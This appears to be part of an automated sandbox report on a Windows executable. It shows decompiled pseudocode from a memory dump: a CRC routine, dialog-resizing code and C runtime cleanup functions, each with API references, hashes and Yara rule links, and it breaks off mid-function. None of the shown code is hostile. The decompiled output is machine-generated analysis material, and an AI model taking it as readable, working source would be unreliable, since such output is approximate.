                            • Opcode ID: c5a3c253f54b37c12cd05f9979f55901904f153f4bb8052c0732b1284848e5c5
                            • Instruction ID: 95cd12ff6f4827988d7a2d5baa671c27225ba66135558b15951752e8a4627c44
                            • Opcode Fuzzy Hash: c5a3c253f54b37c12cd05f9979f55901904f153f4bb8052c0732b1284848e5c5
                            • Instruction Fuzzy Hash: C431F2B17047599FCB15DF28C85127ABBD0FB95300F00892DE9C9D7791D678EA0ACB92
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 009E5D7E, Relevance: .1, Instructions: 76COMMONCrypto
                            Download Yara Rule
                            C-Code - Quality: 100%
                            			E009E5D7E(signed char _a4, signed char _a8, unsigned int _a12) {
				signed char _t49;
				signed char _t51;
				signed char _t67;
				signed char _t68;
				unsigned int _t72;
				unsigned int _t74;

				_t67 = _a8;
				_t49 = _a4;
				_t74 = _a12;
				if(_t74 != 0) {
					while((_t67 & 0x00000007) != 0) {
						_t49 = _t49 >> 0x00000008 ^  *(0xa1e040 + ( *_t67 & 0x000000ff ^ _t49 & 0x000000ff) * 4);
						_t67 = _t67 + 1;
						_a8 = _t67;
						_t74 = _t74 - 1;
						if(_t74 != 0) {
							continue;
						}
						goto L3;
					}
				}
				L3:
				if(_t74 >= 8) {
					_t72 = _t74 >> 3;
					do {
						_t51 = _t49 ^  *_t67;
						_t74 = _t74 - 8;
						_t68 =  *(_t67 + 4);
						_t67 = _a8 + 8;
						_a8 = _t67;
						_t49 =  *(0xa1e040 + (_t68 >> 0x18) * 4) ^  *(0xa1e440 + (_t68 >> 0x00000010 & 0x000000ff) * 4) ^  *(0xa1e840 + (_t68 >> 0x00000008 & 0x000000ff) * 4) ^  *(0xa1f040 + (_t51 >> 0x18) * 4) ^  *(0xa1f440 + (_t51 >> 0x00000010 & 0x000000ff) * 4) ^  *(0xa1f840 + (_t51 >> 0x00000008 & 0x000000ff) * 4) ^  *(0xa1ec40 + (_t68 & 0x000000ff) * 4) ^  *(0xa1fc40 + (_t51 & 0x000000ff) * 4);
						_t72 = _t72 - 1;
					} while (_t72 != 0);
				}
				if(_t74 != 0) {
					do {
						_t49 = _t49 >> 0x00000008 ^  *(0xa1e040 + ( *_t67 & 0x000000ff ^ _t49 & 0x000000ff) * 4);
						_t67 = _t67 + 1;
						_t74 = _t74 - 1;
					} while (_t74 != 0);
				}
				return _t49;
			}









                            0x009e5d81
                            0x009e5d85
                            0x009e5d89
                            0x009e5d8e
                            0x009e5d90
                            0x009e5da0
                            0x009e5da7
                            0x009e5da8
                            0x009e5dab
                            0x009e5dae
                            0x00000000
                            0x00000000
                            0x00000000
                            0x009e5dae
                            0x009e5d90
                            0x009e5db0
                            0x009e5db3
                            0x009e5dbc
                            0x009e5dbf
                            0x009e5dbf
                            0x009e5dc1
                            0x009e5dc4
                            0x009e5e21
                            0x009e5e24
                            0x009e5e38
                            0x009e5e3a
                            0x009e5e3a
                            0x009e5e3f
                            0x009e5e42
                            0x009e5e44
                            0x009e5e4f
                            0x009e5e56
                            0x009e5e57
                            0x009e5e57
                            0x009e5e44
                            0x009e5e61

                            Memory Dump Source
                            • Source File: 00000001.00000002.326946843.00000000009E1000.00000020.00020000.sdmp, Offset: 009E0000, based on PE: true
                            • Associated: 00000001.00000002.326937806.00000000009E0000.00000002.00020000.sdmp Download File
                            • Associated: 00000001.00000002.326997285.0000000000A12000.00000002.00020000.sdmp Download File
                            • Associated: 00000001.00000002.327019506.0000000000A1D000.00000004.00020000.sdmp Download File
                            • Associated: 00000001.00000002.327032098.0000000000A24000.00000004.00020000.sdmp Download File
                            • Associated: 00000001.00000002.327047991.0000000000A40000.00000004.00020000.sdmp Download File
                            • Associated: 00000001.00000002.327055575.0000000000A41000.00000002.00020000.sdmp Download File
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: af65c51cc953904109d1123a4c4389e8ac461a07d27f3232d659cef257bb8d64
                            • Instruction ID: 63c35bbf4b5dbca5d566b59efb2dba8be62926c8dc19fd2df2f0c92e6da14b98
                            • Opcode Fuzzy Hash: af65c51cc953904109d1123a4c4389e8ac461a07d27f3232d659cef257bb8d64
                            • Instruction Fuzzy Hash: 97219831A201A54BCB09CF6EDC905BA7795A74A30134BC12BEE469F2D1C535ED66C7E0
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 009ED70B, Relevance: 26.5, APIs: 12, Strings: 3, Instructions: 235COMMON
                            Download Yara Rule
                            C-Code - Quality: 75%
                            			E009ED70B(struct HWND__* __ecx, void* __eflags, intOrPtr _a8, char _a12) {
				struct HWND__* _v8;
				short _v2048;
				char _v2208;
				char _v2288;
				signed int _v2292;
				char _v2300;
				intOrPtr _v2304;
				struct tagRECT _v2320;
				intOrPtr _v2324;
				intOrPtr _v2336;
				struct tagRECT _v2352;
				struct tagRECT _v2368;
				signed int _v2376;
				char _v2377;
				intOrPtr _v2384;
				intOrPtr _v2393;
				void* __ebx;
				void* __esi;
				signed int _t96;
				signed int _t104;
				struct HWND__* _t106;
				signed int _t119;
				signed int _t134;
				void* _t150;
				void* _t155;
				char _t156;
				void* _t157;
				signed int _t158;
				intOrPtr _t160;
				void* _t163;
				void* _t169;
				long _t170;
				signed int _t174;
				signed int _t185;
				struct HWND__* _t186;
				struct HWND__* _t187;
				void* _t188;
				void* _t191;
				signed int _t192;
				long _t193;
				void* _t200;
				int* _t201;
				struct HWND__* _t202;
				void* _t204;
				void* _t205;
				void* _t207;
				void* _t209;
				void* _t213;

				_t202 = __ecx;
				_v2368.bottom = __ecx;
				E009E3E41( &_v2208, 0x50, L"$%s:", _a8);
				_t207 =  &_v2368 + 0x10;
				E009F11FA( &_v2208,  &_v2288, 0x50);
				_t96 = E00A02BB0( &_v2300);
				_t186 = _v8;
				_t155 = 0;
				_v2376 = _t96;
				_t209 =  *0xa1d5f4 - _t155; // 0x63
				if(_t209 <= 0) {
					L8:
					_t156 = E009ECD7D(_t155, _t202, _t188, _t213, _a8,  &(_v2368.right),  &(_v2368.top));
					_v2377 = _t156;
					GetWindowRect(_t186,  &_v2352);
					GetClientRect(_t186,  &(_v2320.top));
					_t169 = _v2352.right - _v2352.left + 1;
					_t104 = _v2320.bottom;
					_t191 = _v2352.bottom - _v2352.top + 1;
					_v2368.right = 0x64;
					_t204 = _t191 - _v2304;
					_v2368.bottom = _t169 - _t104;
					if(_t156 == 0) {
						L15:
						_t221 = _a12;
						if(_a12 == 0 && E009ECE00(_t156, _v2368.bottom, _t221, _a8, L"CAPTION",  &_v2048, 0x400) != 0) {
							SetWindowTextW(_t186,  &_v2048);
						}
						L18:
						_t205 = _t204 - GetSystemMetrics(8);
						_t106 = GetWindow(_t186, 5);
						_t187 = _t106;
						_v2368.bottom = _t187;
						if(_t156 == 0) {
							L24:
							return _t106;
						}
						_t157 = 0;
						while(_t187 != 0) {
							__eflags = _t157 - 0x200;
							if(_t157 >= 0x200) {
								goto L24;
							}
							GetWindowRect(_t187,  &_v2320);
							_t170 = _v2320.top.left;
							_t192 = 0x64;
							asm("cdq");
							_t193 = _v2320.left;
							asm("cdq");
							_t119 = (_t170 - _t205 - _v2336) * _v2368.top;
							asm("cdq");
							_t174 = 0x64;
							asm("cdq");
							asm("cdq");
							 *0xa1dfd0(_t187, 0, (_t193 - (_v2352.right - _t119 % _t174 >> 1) - _v2352.bottom) * _v2368.right / _t174, _t119 / _t174, (_v2320.right - _t193 + 1) * _v2368.right / _v2352.top, (_v2320.bottom - _t170 + 1) * _v2368.top / _t192, 0x204);
							_t106 = GetWindow(_t187, 2);
							_t187 = _t106;
							__eflags = _t187 - _v2384;
							if(_t187 == _v2384) {
								goto L24;
							}
							_t157 = _t157 + 1;
							__eflags = _t157;
						}
						goto L24;
					}
					if(_a12 != 0) {
						goto L18;
					}
					_t158 = 0x64;
					asm("cdq");
					_t134 = _v2292 * _v2368.top;
					_t160 = _t104 * _v2368.right / _t158 + _v2352.right;
					_v2324 = _t160;
					asm("cdq");
					_t185 = _t134 % _v2352.top;
					_v2352.left = _t134 / _v2352.top + _t204;
					asm("cdq");
					asm("cdq");
					_t200 = (_t191 - _v2352.left - _t185 >> 1) + _v2336;
					_t163 = (_t169 - _t160 - _t185 >> 1) + _v2352.bottom;
					if(_t163 < 0) {
						_t163 = 0;
					}
					if(_t200 < 0) {
						_t200 = 0;
					}
					 *0xa1dfd0(_t186, 0, _t163, _t200, _v2324, _v2352.left,  !(GetWindowLongW(_t186, 0xfffffff0) >> 0xa) & 0x00000002 | 0x00000204);
					GetWindowRect(_t186,  &_v2368);
					_t156 = _v2393;
					goto L15;
				} else {
					_t201 = 0xa1d154;
					do {
						if( *_t201 > 0) {
							_t9 =  &(_t201[1]); // 0xa133e0
							_t150 = E00A05460( &_v2288,  *_t9, _t96);
							_t207 = _t207 + 0xc;
							if(_t150 == 0) {
								_t12 =  &(_t201[1]); // 0xa133e0
								if(E009ECF57(_t155, _t202, _t201,  *_t12,  &_v2048, 0x400) != 0) {
									SetDlgItemTextW(_t186,  *_t201,  &_v2048);
								}
							}
							_t96 = _v2368.top;
						}
						_t155 = _t155 + 1;
						_t201 =  &(_t201[3]);
						_t213 = _t155 -  *0xa1d5f4; // 0x63
					} while (_t213 < 0);
					goto L8;
				}
			}



















































                            0x009ed723
                            0x009ed72d
                            0x009ed731
                            0x009ed736
                            0x009ed748
                            0x009ed752
                            0x009ed757
                            0x009ed75e
                            0x009ed761
                            0x009ed765
                            0x009ed76b
                            0x009ed7c8
                            0x009ed7e0
                            0x009ed7e8
                            0x009ed7ec
                            0x009ed7f8
                            0x009ed80a
                            0x009ed811
                            0x009ed815
                            0x009ed818
                            0x009ed820
                            0x009ed826
                            0x009ed82c
                            0x009ed8cd
                            0x009ed8cd
                            0x009ed8d5
                            0x009ed906
                            0x009ed906
                            0x009ed90c
                            0x009ed917
                            0x009ed919
                            0x009ed91f
                            0x009ed921
                            0x009ed927
                            0x009ed9d9
                            0x009ed9d9
                            0x009ed9d9
                            0x009ed92d
                            0x009ed9c7
                            0x009ed934
                            0x009ed93a
                            0x00000000
                            0x00000000
                            0x009ed946
                            0x009ed950
                            0x009ed965
                            0x009ed96a
                            0x009ed96d
                            0x009ed983
                            0x009ed98b
                            0x009ed98d
                            0x009ed98e
                            0x009ed996
                            0x009ed9a8
                            0x009ed9af
                            0x009ed9b8
                            0x009ed9be
                            0x009ed9c0
                            0x009ed9c4
                            0x00000000
                            0x00000000
                            0x009ed9c6
                            0x009ed9c6
                            0x009ed9c6
                            0x00000000
                            0x009ed9c7
                            0x009ed83a
                            0x00000000
                            0x00000000
                            0x009ed847
                            0x009ed848
                            0x009ed851
                            0x009ed856
                            0x009ed85c
                            0x009ed860
                            0x009ed861
                            0x009ed867
                            0x009ed871
                            0x009ed878
                            0x009ed881
                            0x009ed885
                            0x009ed889
                            0x009ed88b
                            0x009ed88b
                            0x009ed88f
                            0x009ed891
                            0x009ed891
                            0x009ed8b7
                            0x009ed8c3
                            0x009ed8c9
                            0x00000000
                            0x009ed76d
                            0x009ed76d
                            0x009ed772
                            0x009ed775
                            0x009ed778
                            0x009ed780
                            0x009ed785
                            0x009ed78a
                            0x009ed79b
                            0x009ed7a5
                            0x009ed7b2
                            0x009ed7b2
                            0x009ed7a5
                            0x009ed7b8
                            0x009ed7b8
                            0x009ed7bc
                            0x009ed7bd
                            0x009ed7c0
                            0x009ed7c0
                            0x00000000
                            0x009ed772

                            APIs
                            • _swprintf.LIBCMT ref: 009ED731
                              • Part of subcall function 009E3E41: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 009E3E54
                              • Part of subcall function 009F11FA: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,000000FF,009ED74D,?,00000000,00000000,?,?,?,009ED74D,?,?,00000050), ref: 009F1217
                            • _strlen.LIBCMT ref: 009ED752
                            • SetDlgItemTextW.USER32(?,00A1D154,?), ref: 009ED7B2
                            • GetWindowRect.USER32(?,?), ref: 009ED7EC
                            • GetClientRect.USER32(?,?), ref: 009ED7F8
                            • GetWindowLongW.USER32(?,000000F0), ref: 009ED896
                            • GetWindowRect.USER32(?,?), ref: 009ED8C3
                            • SetWindowTextW.USER32(?,?), ref: 009ED906
                            • GetSystemMetrics.USER32(00000008), ref: 009ED90E
                            • GetWindow.USER32(?,00000005), ref: 009ED919
                            • GetWindowRect.USER32(00000000,?), ref: 009ED946
                            • GetWindow.USER32(00000000,00000002), ref: 009ED9B8
                            Strings
                            Memory Dump Source
                            • Source File: 00000001.00000002.326946843.00000000009E1000.00000020.00020000.sdmp, Offset: 009E0000, based on PE: true
                            • Associated: 00000001.00000002.326937806.00000000009E0000.00000002.00020000.sdmp Download File
                            • Associated: 00000001.00000002.326997285.0000000000A12000.00000002.00020000.sdmp Download File
                            • Associated: 00000001.00000002.327019506.0000000000A1D000.00000004.00020000.sdmp Download File
                            • Associated: 00000001.00000002.327032098.0000000000A24000.00000004.00020000.sdmp Download File
                            • Associated: 00000001.00000002.327047991.0000000000A40000.00000004.00020000.sdmp Download File
                            • Associated: 00000001.00000002.327055575.0000000000A41000.00000002.00020000.sdmp Download File
                            Similarity
                            • API ID: Window$Rect$Text$ByteCharClientItemLongMetricsMultiSystemWide__vswprintf_c_l_strlen_swprintf
                            • String ID: $%s:$CAPTION$d
                            • API String ID: 2407758923-2512411981
                            • Opcode ID: 2e9dc5104073759f59997648fdb31389bb53e5e7d473c9ed94c4368b06769219
                            • Instruction ID: 93b41b065a829cbce4fc4663fc9532c73b1bbac72ed911e0b8f4c4de0a59fbd2
                            • Opcode Fuzzy Hash: 2e9dc5104073759f59997648fdb31389bb53e5e7d473c9ed94c4368b06769219
                            • Instruction Fuzzy Hash: D681DF72109341AFC711DFA9CD84BAFBBE9EB88704F04491DFA8593291D631ED068B52
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 00A0B784, Relevance: 19.6, APIs: 13, Instructions: 114COMMON
                            Download Yara Rule
                            C-Code - Quality: 100%
                            			E00A0B784(intOrPtr _a4) {
				intOrPtr _v8;
				intOrPtr _t25;
				intOrPtr* _t26;
				intOrPtr _t28;
				intOrPtr* _t29;
				intOrPtr* _t31;
				intOrPtr* _t45;
				intOrPtr* _t46;
				intOrPtr* _t47;
				intOrPtr* _t55;
				intOrPtr* _t70;
				intOrPtr _t74;

				_t74 = _a4;
				_t25 =  *((intOrPtr*)(_t74 + 0x88));
				if(_t25 != 0 && _t25 != 0xa1dd50) {
					_t45 =  *((intOrPtr*)(_t74 + 0x7c));
					if(_t45 != 0 &&  *_t45 == 0) {
						_t46 =  *((intOrPtr*)(_t74 + 0x84));
						if(_t46 != 0 &&  *_t46 == 0) {
							E00A07A50(_t46);
							E00A0B363( *((intOrPtr*)(_t74 + 0x88)));
						}
						_t47 =  *((intOrPtr*)(_t74 + 0x80));
						if(_t47 != 0 &&  *_t47 == 0) {
							E00A07A50(_t47);
							E00A0B461( *((intOrPtr*)(_t74 + 0x88)));
						}
						E00A07A50( *((intOrPtr*)(_t74 + 0x7c)));
						E00A07A50( *((intOrPtr*)(_t74 + 0x88)));
					}
				}
				_t26 =  *((intOrPtr*)(_t74 + 0x8c));
				if(_t26 != 0 &&  *_t26 == 0) {
					E00A07A50( *((intOrPtr*)(_t74 + 0x90)) - 0xfe);
					E00A07A50( *((intOrPtr*)(_t74 + 0x94)) - 0x80);
					E00A07A50( *((intOrPtr*)(_t74 + 0x98)) - 0x80);
					E00A07A50( *((intOrPtr*)(_t74 + 0x8c)));
				}
				E00A0B8F7( *((intOrPtr*)(_t74 + 0x9c)));
				_t28 = 6;
				_t55 = _t74 + 0xa0;
				_v8 = _t28;
				_t70 = _t74 + 0x28;
				do {
					if( *((intOrPtr*)(_t70 - 8)) != 0xa1d818) {
						_t31 =  *_t70;
						if(_t31 != 0 &&  *_t31 == 0) {
							E00A07A50(_t31);
							E00A07A50( *_t55);
						}
						_t28 = _v8;
					}
					if( *((intOrPtr*)(_t70 - 0xc)) != 0) {
						_t29 =  *((intOrPtr*)(_t70 - 4));
						if(_t29 != 0 &&  *_t29 == 0) {
							E00A07A50(_t29);
						}
						_t28 = _v8;
					}
					_t55 = _t55 + 4;
					_t70 = _t70 + 0x10;
					_t28 = _t28 - 1;
					_v8 = _t28;
				} while (_t28 != 0);
				return E00A07A50(_t74);
			}















                            0x00a0b78c
                            0x00a0b790
                            0x00a0b798
                            0x00a0b7a1
                            0x00a0b7a6
                            0x00a0b7ad
                            0x00a0b7b5
                            0x00a0b7bd
                            0x00a0b7c8
                            0x00a0b7ce
                            0x00a0b7cf
                            0x00a0b7d7
                            0x00a0b7df
                            0x00a0b7ea
                            0x00a0b7f0
                            0x00a0b7f4
                            0x00a0b7ff
                            0x00a0b805
                            0x00a0b7a6
                            0x00a0b806
                            0x00a0b80e
                            0x00a0b821
                            0x00a0b834
                            0x00a0b842
                            0x00a0b84d
                            0x00a0b852
                            0x00a0b85b
                            0x00a0b863
                            0x00a0b864
                            0x00a0b86a
                            0x00a0b86d
                            0x00a0b870
                            0x00a0b877
                            0x00a0b879
                            0x00a0b87d
                            0x00a0b885
                            0x00a0b88c
                            0x00a0b892
                            0x00a0b893
                            0x00a0b893
                            0x00a0b89a
                            0x00a0b89c
                            0x00a0b8a1
                            0x00a0b8a9
                            0x00a0b8ae
                            0x00a0b8af
                            0x00a0b8af
                            0x00a0b8b2
                            0x00a0b8b5
                            0x00a0b8b8
                            0x00a0b8bb
                            0x00a0b8bb
                            0x00a0b8cd

                            APIs
                            • ___free_lconv_mon.LIBCMT ref: 00A0B7C8
                              • Part of subcall function 00A0B363: _free.LIBCMT ref: 00A0B380
                              • Part of subcall function 00A0B363: _free.LIBCMT ref: 00A0B392
                              • Part of subcall function 00A0B363: _free.LIBCMT ref: 00A0B3A4
                              • Part of subcall function 00A0B363: _free.LIBCMT ref: 00A0B3B6
                              • Part of subcall function 00A0B363: _free.LIBCMT ref: 00A0B3C8
                              • Part of subcall function 00A0B363: _free.LIBCMT ref: 00A0B3DA
                              • Part of subcall function 00A0B363: _free.LIBCMT ref: 00A0B3EC
                              • Part of subcall function 00A0B363: _free.LIBCMT ref: 00A0B3FE
                              • Part of subcall function 00A0B363: _free.LIBCMT ref: 00A0B410
                              • Part of subcall function 00A0B363: _free.LIBCMT ref: 00A0B422
                              • Part of subcall function 00A0B363: _free.LIBCMT ref: 00A0B434
                              • Part of subcall function 00A0B363: _free.LIBCMT ref: 00A0B446
                              • Part of subcall function 00A0B363: _free.LIBCMT ref: 00A0B458
                            • _free.LIBCMT ref: 00A0B7BD
                              • Part of subcall function 00A07A50: RtlFreeHeap.NTDLL(00000000,00000000,?,00A0B4F8,?,00000000,?,00000000,?,00A0B51F,?,00000007,?,?,00A0B91C,?), ref: 00A07A66
                              • Part of subcall function 00A07A50: GetLastError.KERNEL32(?,?,00A0B4F8,?,00000000,?,00000000,?,00A0B51F,?,00000007,?,?,00A0B91C,?,?), ref: 00A07A78
                            • _free.LIBCMT ref: 00A0B7DF
                            • _free.LIBCMT ref: 00A0B7F4
                            • _free.LIBCMT ref: 00A0B7FF
                            • _free.LIBCMT ref: 00A0B821
                            • _free.LIBCMT ref: 00A0B834
                            • _free.LIBCMT ref: 00A0B842
                            • _free.LIBCMT ref: 00A0B84D
                            • _free.LIBCMT ref: 00A0B885
                            • _free.LIBCMT ref: 00A0B88C
                            • _free.LIBCMT ref: 00A0B8A9
                            • _free.LIBCMT ref: 00A0B8C1
                            Memory Dump Source
                            • Source File: 00000001.00000002.326946843.00000000009E1000.00000020.00020000.sdmp, Offset: 009E0000, based on PE: true
                            • Associated: 00000001.00000002.326937806.00000000009E0000.00000002.00020000.sdmp Download File
                            • Associated: 00000001.00000002.326997285.0000000000A12000.00000002.00020000.sdmp Download File
                            • Associated: 00000001.00000002.327019506.0000000000A1D000.00000004.00020000.sdmp Download File
                            • Associated: 00000001.00000002.327032098.0000000000A24000.00000004.00020000.sdmp Download File
                            • Associated: 00000001.00000002.327047991.0000000000A40000.00000004.00020000.sdmp Download File
                            • Associated: 00000001.00000002.327055575.0000000000A41000.00000002.00020000.sdmp Download File
                            Similarity
                            • API ID: _free$ErrorFreeHeapLast___free_lconv_mon
                            • String ID:
                            • API String ID: 161543041-0
                            • Opcode ID: bf154c71b92cef33e0a60a442621a53d340ffd5dd4c3c895cab683da5ae9d192
                            • Instruction ID: 926687588d396563cd83d61c1ebcea4aee67dbed42fca3f53d0f743c264649e3
                            • Opcode Fuzzy Hash: bf154c71b92cef33e0a60a442621a53d340ffd5dd4c3c895cab683da5ae9d192
                            • Instruction Fuzzy Hash: 9E314B71E142099FEB20AB39FA85B5E73E8EF00390F149429E059E71E1DF31BD948724
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 009FC343, Relevance: 15.8, APIs: 8, Strings: 1, Instructions: 80windowCOMMON
                            Download Yara Rule
                            C-Code - Quality: 100%
                            			E009FC343(void* __edx, void* __eflags, void* __fp0, struct HWND__* _a4) {
				intOrPtr _v20;
				intOrPtr _v24;
				void _v28;
				short _v4124;
				void* _t10;
				struct HWND__* _t11;
				void* _t21;
				void* _t28;
				void* _t29;
				void* _t31;
				struct HWND__* _t34;
				void* _t45;

				_t45 = __fp0;
				_t29 = __edx;
				E009FD940();
				_t10 = E009F952A(__eflags);
				if(_t10 == 0) {
					return _t10;
				}
				_t11 = GetWindow(_a4, 5);
				_t34 = _t11;
				_t31 = 0;
				_a4 = _t34;
				if(_t34 == 0) {
					L11:
					return _t11;
				}
				while(_t31 < 0x200) {
					GetClassNameW(_t34,  &_v4124, 0x800);
					if(E009F1410( &_v4124, L"STATIC") == 0 && (GetWindowLongW(_t34, 0xfffffff0) & 0x0000001f) == 0xe) {
						_t28 = SendMessageW(_t34, 0x173, 0, 0);
						if(_t28 != 0) {
							GetObjectW(_t28, 0x18,  &_v28);
							_t21 = E009F958C(_v20);
							SendMessageW(_t34, 0x172, 0, E009F975D(_t29, _t45, _t28, E009F9549(_v24), _t21));
							DeleteObject(_t28);
						}
					}
					_t11 = GetWindow(_t34, 2);
					_t34 = _t11;
					if(_t34 != _a4) {
						_t31 = _t31 + 1;
						if(_t34 != 0) {
							continue;
						}
					}
					break;
				}
				goto L11;
			}















                            0x009fc343
                            0x009fc343
                            0x009fc34b
                            0x009fc350
                            0x009fc357
                            0x009fc42e
                            0x009fc42e
                            0x009fc364
                            0x009fc36a
                            0x009fc36c
                            0x009fc36e
                            0x009fc373
                            0x009fc429
                            0x00000000
                            0x009fc42a
                            0x009fc37a
                            0x009fc393
                            0x009fc3ac
                            0x009fc3ce
                            0x009fc3d2
                            0x009fc3db
                            0x009fc3e4
                            0x009fc402
                            0x009fc409
                            0x009fc409
                            0x009fc3d2
                            0x009fc412
                            0x009fc418
                            0x009fc41d
                            0x009fc41f
                            0x009fc422
                            0x00000000
                            0x00000000
                            0x009fc422
                            0x00000000
                            0x009fc41d
                            0x00000000

                            APIs
                            • GetWindow.USER32(?,00000005), ref: 009FC364
                            • GetClassNameW.USER32(00000000,?,00000800), ref: 009FC393
                              • Part of subcall function 009F1410: CompareStringW.KERNEL32(00000400,00001001,00000000,000000FF,?,000000FF,009EACFE,?,?,?,009EACAD,?,-00000002,?,00000000,?), ref: 009F1426
                            • GetWindowLongW.USER32(00000000,000000F0), ref: 009FC3B1
                            • SendMessageW.USER32(00000000,00000173,00000000,00000000), ref: 009FC3C8
                            • GetObjectW.GDI32(00000000,00000018,?), ref: 009FC3DB
                              • Part of subcall function 009F958C: GetDC.USER32(00000000), ref: 009F9598
                              • Part of subcall function 009F958C: GetDeviceCaps.GDI32(00000000,0000005A), ref: 009F95A7
                              • Part of subcall function 009F958C: ReleaseDC.USER32(00000000,00000000), ref: 009F95B5
                              • Part of subcall function 009F9549: GetDC.USER32(00000000), ref: 009F9555
                              • Part of subcall function 009F9549: GetDeviceCaps.GDI32(00000000,00000058), ref: 009F9564
                              • Part of subcall function 009F9549: ReleaseDC.USER32(00000000,00000000), ref: 009F9572
                            • SendMessageW.USER32(00000000,00000172,00000000,00000000), ref: 009FC402
                            • DeleteObject.GDI32(00000000), ref: 009FC409
                            • GetWindow.USER32(00000000,00000002), ref: 009FC412
                            Strings
                            Memory Dump Source
                            • Source File: 00000001.00000002.326946843.00000000009E1000.00000020.00020000.sdmp, Offset: 009E0000, based on PE: true
                            • Associated: 00000001.00000002.326937806.00000000009E0000.00000002.00020000.sdmp Download File
                            • Associated: 00000001.00000002.326997285.0000000000A12000.00000002.00020000.sdmp Download File
                            • Associated: 00000001.00000002.327019506.0000000000A1D000.00000004.00020000.sdmp Download File
                            • Associated: 00000001.00000002.327032098.0000000000A24000.00000004.00020000.sdmp Download File
                            • Associated: 00000001.00000002.327047991.0000000000A40000.00000004.00020000.sdmp Download File
                            • Associated: 00000001.00000002.327055575.0000000000A41000.00000002.00020000.sdmp Download File
                            Similarity
                            • API ID: Window$CapsDeviceMessageObjectReleaseSend$ClassCompareDeleteLongNameString
                            • String ID: STATIC
                            • API String ID: 1444658586-1882779555
                            • Opcode ID: e5948e4c62391e1eddf57715aa6a3514f1ea7cc7d8d40d7295728842f07db4b2
                            • Instruction ID: a4f7e2bd2333eea41f4172752f87137b30e2d34499c1eb320408f05e642d02f2
                            • Opcode Fuzzy Hash: e5948e4c62391e1eddf57715aa6a3514f1ea7cc7d8d40d7295728842f07db4b2
                            • Instruction Fuzzy Hash: 432193B254022C7BEB21ABA48D4AFFE766CAF45751F00C021FB05A60E1DB744A4787A4
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 00A08422, Relevance: 15.1, APIs: 10, Instructions: 54COMMON
                            Download Yara Rule
                            C-Code - Quality: 100%
                            			E00A08422(char _a4) {
				char _v8;

				_t26 = _a4;
				_t52 =  *_a4;
				if( *_a4 != 0xa14be0) {
					E00A07A50(_t52);
					_t26 = _a4;
				}
				E00A07A50( *((intOrPtr*)(_t26 + 0x3c)));
				E00A07A50( *((intOrPtr*)(_a4 + 0x30)));
				E00A07A50( *((intOrPtr*)(_a4 + 0x34)));
				E00A07A50( *((intOrPtr*)(_a4 + 0x38)));
				E00A07A50( *((intOrPtr*)(_a4 + 0x28)));
				E00A07A50( *((intOrPtr*)(_a4 + 0x2c)));
				E00A07A50( *((intOrPtr*)(_a4 + 0x40)));
				E00A07A50( *((intOrPtr*)(_a4 + 0x44)));
				E00A07A50( *((intOrPtr*)(_a4 + 0x360)));
				_v8 =  &_a4;
				E00A082E8(5,  &_v8);
				_v8 =  &_a4;
				return E00A08338(4,  &_v8);
			}




                            0x00a08428
                            0x00a0842b
                            0x00a08433
                            0x00a08436
                            0x00a0843b
                            0x00a0843e
                            0x00a08442
                            0x00a0844d
                            0x00a08458
                            0x00a08463
                            0x00a0846e
                            0x00a08479
                            0x00a08484
                            0x00a0848f
                            0x00a0849d
                            0x00a084a5
                            0x00a084ae
                            0x00a084b6
                            0x00a084ca

                            APIs
                            • _free.LIBCMT ref: 00A08436
                              • Part of subcall function 00A07A50: RtlFreeHeap.NTDLL(00000000,00000000,?,00A0B4F8,?,00000000,?,00000000,?,00A0B51F,?,00000007,?,?,00A0B91C,?), ref: 00A07A66
                              • Part of subcall function 00A07A50: GetLastError.KERNEL32(?,?,00A0B4F8,?,00000000,?,00000000,?,00A0B51F,?,00000007,?,?,00A0B91C,?,?), ref: 00A07A78
                            • _free.LIBCMT ref: 00A08442
                            • _free.LIBCMT ref: 00A0844D
                            • _free.LIBCMT ref: 00A08458
                            • _free.LIBCMT ref: 00A08463
                            • _free.LIBCMT ref: 00A0846E
                            • _free.LIBCMT ref: 00A08479
                            • _free.LIBCMT ref: 00A08484
                            • _free.LIBCMT ref: 00A0848F
                            • _free.LIBCMT ref: 00A0849D
                            Memory Dump Source
                            • Source File: 00000001.00000002.326946843.00000000009E1000.00000020.00020000.sdmp, Offset: 009E0000, based on PE: true
                            • Associated: 00000001.00000002.326937806.00000000009E0000.00000002.00020000.sdmp Download File
                            • Associated: 00000001.00000002.326997285.0000000000A12000.00000002.00020000.sdmp Download File
                            • Associated: 00000001.00000002.327019506.0000000000A1D000.00000004.00020000.sdmp Download File
                            • Associated: 00000001.00000002.327032098.0000000000A24000.00000004.00020000.sdmp Download File
                            • Associated: 00000001.00000002.327047991.0000000000A40000.00000004.00020000.sdmp Download File
                            • Associated: 00000001.00000002.327055575.0000000000A41000.00000002.00020000.sdmp Download File
                            Similarity
                            • API ID: _free$ErrorFreeHeapLast
                            • String ID:
                            • API String ID: 776569668-0
                            • Opcode ID: b8c97fa985f005a0942ffc36d1b7d6fae844a0c6da900a0d825f08a85800c736
                            • Instruction ID: d77389b5f8a7bdbbfbafabd16df9749b70ae01256460f021dcb91889e4fa5a5b
                            • Opcode Fuzzy Hash: b8c97fa985f005a0942ffc36d1b7d6fae844a0c6da900a0d825f08a85800c736
                            • Instruction Fuzzy Hash: 8D119BB5A1410CFFCB01EF64EA42CDE3B65EF04390B5151A5FA194F1A2DA31EF509B80
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 009E200C, Relevance: 14.5, APIs: 5, Strings: 3, Instructions: 480COMMON
                            Download Yara Rule
                            C-Code - Quality: 93%
                            			E009E200C(intOrPtr __ecx) {
				signed int _t135;
				void* _t137;
				signed int _t139;
				unsigned int _t140;
				signed int _t144;
				signed int _t161;
				signed int _t164;
				void* _t167;
				void* _t172;
				signed int _t175;
				signed char _t178;
				signed char _t179;
				signed char _t180;
				signed int _t182;
				signed int _t185;
				signed int _t187;
				signed int _t188;
				signed char _t220;
				signed char _t232;
				signed int _t233;
				signed int _t236;
				intOrPtr _t240;
				signed int _t244;
				signed int _t246;
				signed int _t247;
				signed int _t257;
				signed int _t258;
				signed char _t262;
				signed int _t263;
				signed int _t265;
				intOrPtr _t272;
